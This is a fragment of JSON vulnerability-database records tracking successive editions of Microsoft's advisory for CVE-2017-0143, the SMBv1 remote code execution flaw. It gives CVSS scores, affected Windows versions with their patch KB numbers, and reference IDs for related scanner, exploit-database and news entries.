"KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for Itanium-Based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows RT 8.1", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 10 Version 1607 for x64-based Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1607 for 32-bit Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1511 for x64-based Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 Version 1511 for 32-bit Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 for x64-based Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows 10 for 32-bit Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}], "vendorCvss": {}}, "lastseen": "2021-09-19T16:52:15", "differentElements": ["msAffectedSoftware"], "edition": 64}, {"bulletin": {"id": "MS:CVE-2017-0143", "hash": "bdbcad436fc25396d6ee8890a5e6edb2", "type": "mscve", "bulletinFamily": "microsoft", "title": "Windows SMB Remote Code Execution Vulnerability", "description": "A remote code execution vulnerability exists in the way that the Microsoft Server Message Block 1.0 (SMBv1) server handles certain requests. An attacker who successfully exploited the vulnerability could gain the ability to execute code on the target server.\n\nTo exploit the vulnerability, in most situations, an authenticated attacker could send a specially crafted packet to a targeted SMBv1 server.\n\nThe security update addresses the vulnerability by correcting how SMBv1 handles these specially crafted requests.\n", "published": "2017-03-14T07:00:00", "modified": "2017-03-14T07:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2017-0143", "reporter": "Microsoft", "references": [], "cvelist": ["CVE-2017-0143"], "immutableFields": [], "lastseen": "2021-09-19T18:49:52", "history": [], "viewCount": 9, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2017-0143"]}, {"type": "attackerkb", "idList": ["AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1", "AKB:D476227F-C4B1-49E3-9947-897077E5150D", "AKB:400EDB06-73BF-4A6D-A113-643077965C7B"]}, {"type": "symantec", "idList": ["SMNTC-96703"]}, {"type": "talosblog", "idList": ["TALOSBLOG:E2BCC6AEFE1A7A25F49757116346A7A6"]}, {"type": "threatpost", "idList": ["THREATPOST:F569DB7301109F1CDBCA30319EA8E2E7", "THREATPOST:7E66A86C86BE8481D1B905B183CA42C3", "THREATPOST:43C3E019D454987EF522E299C31E9D3F", "THREATPOST:7D1D823549046978FD52257C68DF7801"]}, {"type": "canvas", "idList": ["ETERNALBLUE", "MS17_010"]}, {"type": "thn", "idList": ["THN:C50AC2400E56ED88DBA7FC6DAC8360A8", "THN:BC214880895281474C1A8EF7B7D98C13", "THN:F12E2167FDA829ED32C7A16A83B048BF"]}, {"type": "myhack58", "idList": ["MYHACK58:62201786371"]}, {"type": "saint", "idList": ["SAINT:BD676E3751A4D110EAA275BF92CA7E46", "SAINT:DAEC4BA69103823E03C8F3C832C5B41D"]}, {"type": "carbonblack", "idList": ["CARBONBLACK:6730D6EB8DF875C002A93DBC78C80B9D"]}, {"type": "nmap", "idList": ["NMAP:SMB-VULN-MS17-010.NSE"]}, {"type": "exploitdb", "idList": ["EDB-ID:41987", "EDB-ID:43970", "EDB-ID:41891", "EDB-ID:47456"]}, {"type": "zdt", "idList": ["1337DAY-ID-27752", "1337DAY-ID-33895", "1337DAY-ID-29702", "1337DAY-ID-27613", "1337DAY-ID-27786", "1337DAY-ID-33313"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:142548", "PACKETSTORM:142181", "PACKETSTORM:154690", "PACKETSTORM:146236", "PACKETSTORM:156196"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "nessus", "idList": ["SMB_NT_MS17-010.NASL", "700059.PRM", "MS17-010.NASL", "700099.PRM"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0"]}, {"type": "seebug", "idList": ["SSV:92952"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810810", "OPENVAS:1361412562310810676"]}, {"type": "kaspersky", "idList": ["KLA11902", "KLA10977", "KLA10979"]}, {"type": "mskb", "idList": ["KB4013389"]}, {"type": "ics", "idList": ["ICSMA-18-058-02", "ICSMA-20-170-01"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:9BA334FCEF38374A0B09A0614B2D74D4"]}], "modified": "2021-09-19T14:49:48", "rev": 2}, "score": {"value": 7.8, "vector": "NONE", "modified": "2021-09-19T14:49:48", "rev": 2}}, "objectVersion": "1.6", "kbList": ["KB3205401", "KB4012216", "KB4012213", "KB4012215", "KB4013198", "KB4012212", "KB3205409", "KB3213986", "KBMS16-110, 3187754", "KB4013429", "KB3210720", "KB4012214", "KB3212646", "KB4012598", "KB4012217", "KB3210721", "KB3177186", "KB4012606"], "msrc": "", "mscve": "CVE-2017-0143", "msAffectedSoftware": [{"name": "Windows Server 2016 (Server Core installation)", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2016", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Vista x64 Edition Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for Itanium-Based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows RT 8.1", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 10 Version 1607 for x64-based Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1607 for 32-bit Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1511 for x64-based Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 Version 1511 for 32-bit Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 for x64-based Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows 10 for 32-bit Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows Server 2016 (Server Core installation)", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2016", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Vista x64 Edition Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for Itanium-Based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows RT 8.1", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 10 Version 1607 for x64-based Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1607 for 32-bit Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1511 for x64-based Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 Version 1511 for 32-bit Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 for x64-based Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows 10 for 32-bit Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}], "vendorCvss": {}}, "lastseen": "2021-09-19T18:49:52", "differentElements": ["msAffectedSoftware"], "edition": 65}, {"bulletin": {"id": "MS:CVE-2017-0143", "hash": "f7b4e50f4ef2188508dc09f5f5ce8194", "type": "mscve", "bulletinFamily": "microsoft", "title": "Windows SMB Remote Code Execution Vulnerability", "description": "A remote code execution vulnerability exists in the way that the Microsoft Server Message Block 1.0 (SMBv1) server handles certain requests. An attacker who successfully exploited the vulnerability could gain the ability to execute code on the target server.\n\nTo exploit the vulnerability, in most situations, an authenticated attacker could send a specially crafted packet to a targeted SMBv1 server.\n\nThe security update addresses the vulnerability by correcting how SMBv1 handles these specially crafted requests.\n", "published": "2017-03-14T07:00:00", "modified": "2017-03-14T07:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2017-0143", "reporter": "Microsoft", "references": [], "cvelist": ["CVE-2017-0143"], "immutableFields": [], "lastseen": "2021-09-19T20:59:37", "history": [], "viewCount": 9, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2017-0143"]}, {"type": "attackerkb", "idList": ["AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1", "AKB:D476227F-C4B1-49E3-9947-897077E5150D", "AKB:400EDB06-73BF-4A6D-A113-643077965C7B"]}, {"type": "symantec", "idList": ["SMNTC-96703"]}, {"type": "talosblog", "idList": ["TALOSBLOG:E2BCC6AEFE1A7A25F49757116346A7A6"]}, {"type": "threatpost", "idList": ["THREATPOST:F569DB7301109F1CDBCA30319EA8E2E7", "THREATPOST:7E66A86C86BE8481D1B905B183CA42C3", "THREATPOST:43C3E019D454987EF522E299C31E9D3F", "THREATPOST:7D1D823549046978FD52257C68DF7801"]}, {"type": "canvas", "idList": ["ETERNALBLUE", "MS17_010"]}, {"type": "thn", "idList": ["THN:C50AC2400E56ED88DBA7FC6DAC8360A8", "THN:BC214880895281474C1A8EF7B7D98C13", "THN:F12E2167FDA829ED32C7A16A83B048BF"]}, {"type": "myhack58", "idList": ["MYHACK58:62201786371"]}, {"type": "saint", "idList": ["SAINT:BD676E3751A4D110EAA275BF92CA7E46", "SAINT:DAEC4BA69103823E03C8F3C832C5B41D"]}, {"type": "carbonblack", "idList": ["CARBONBLACK:6730D6EB8DF875C002A93DBC78C80B9D"]}, {"type": "nmap", "idList": ["NMAP:SMB-VULN-MS17-010.NSE"]}, {"type": "exploitdb", "idList": ["EDB-ID:41987", "EDB-ID:43970", "EDB-ID:41891", "EDB-ID:47456"]}, {"type": "zdt", "idList": ["1337DAY-ID-27752", "1337DAY-ID-33895", "1337DAY-ID-29702", "1337DAY-ID-27613", "1337DAY-ID-27786", "1337DAY-ID-33313"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:142548", "PACKETSTORM:142181", "PACKETSTORM:154690", "PACKETSTORM:146236", "PACKETSTORM:156196"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "nessus", "idList": ["SMB_NT_MS17-010.NASL", "700059.PRM", "MS17-010.NASL", "700099.PRM"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0"]}, {"type": "seebug", "idList": ["SSV:92952"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810810", "OPENVAS:1361412562310810676"]}, {"type": "kaspersky", "idList": ["KLA11902", "KLA10977", "KLA10979"]}, {"type": "mskb", "idList": ["KB4013389"]}, {"type": "ics", "idList": ["ICSMA-18-058-02", "ICSMA-20-170-01"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:9BA334FCEF38374A0B09A0614B2D74D4"]}], "modified": "2021-09-19T14:49:48", "rev": 2}, "score": {"value": 7.8, "vector": "NONE", "modified": "2021-09-19T14:49:48", "rev": 2}}, "objectVersion": "1.6", "kbList": ["KB3177186", "KB3210721", "KBMS16-110, 3187754", "KB3210720", "KB4012217", "KB3212646", "KB4012216", "KB4013198", "KB3205401", "KB4012214", "KB4012212", "KB4012215", "KB4012598", "KB4013429", "KB4012606", "KB4012213", "KB3205409", "KB3213986"], "msrc": "", "mscve": "CVE-2017-0143", "msAffectedSoftware": [{"name": "Windows Server 2016 (Server Core installation)", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2016", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Vista x64 Edition Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for Itanium-Based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows RT 8.1", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 10 Version 1607 for x64-based Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1607 for 32-bit Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1511 for x64-based Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 Version 1511 for 32-bit Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 for x64-based Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows 10 for 32-bit Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}], "vendorCvss": {}}, "lastseen": "2021-09-19T20:59:37", "differentElements": ["msAffectedSoftware"], "edition": 66}, {"bulletin": {"id": "MS:CVE-2017-0143", "hash": "bdbcad436fc25396d6ee8890a5e6edb2", "type": "mscve", "bulletinFamily": "microsoft", "title": "Windows SMB Remote Code Execution Vulnerability", "description": "A remote code execution vulnerability exists in the way that the Microsoft Server Message Block 1.0 (SMBv1) server handles certain requests. An attacker who successfully exploited the vulnerability could gain the ability to execute code on the target server.\n\nTo exploit the vulnerability, in most situations, an authenticated attacker could send a specially crafted packet to a targeted SMBv1 server.\n\nThe security update addresses the vulnerability by correcting how 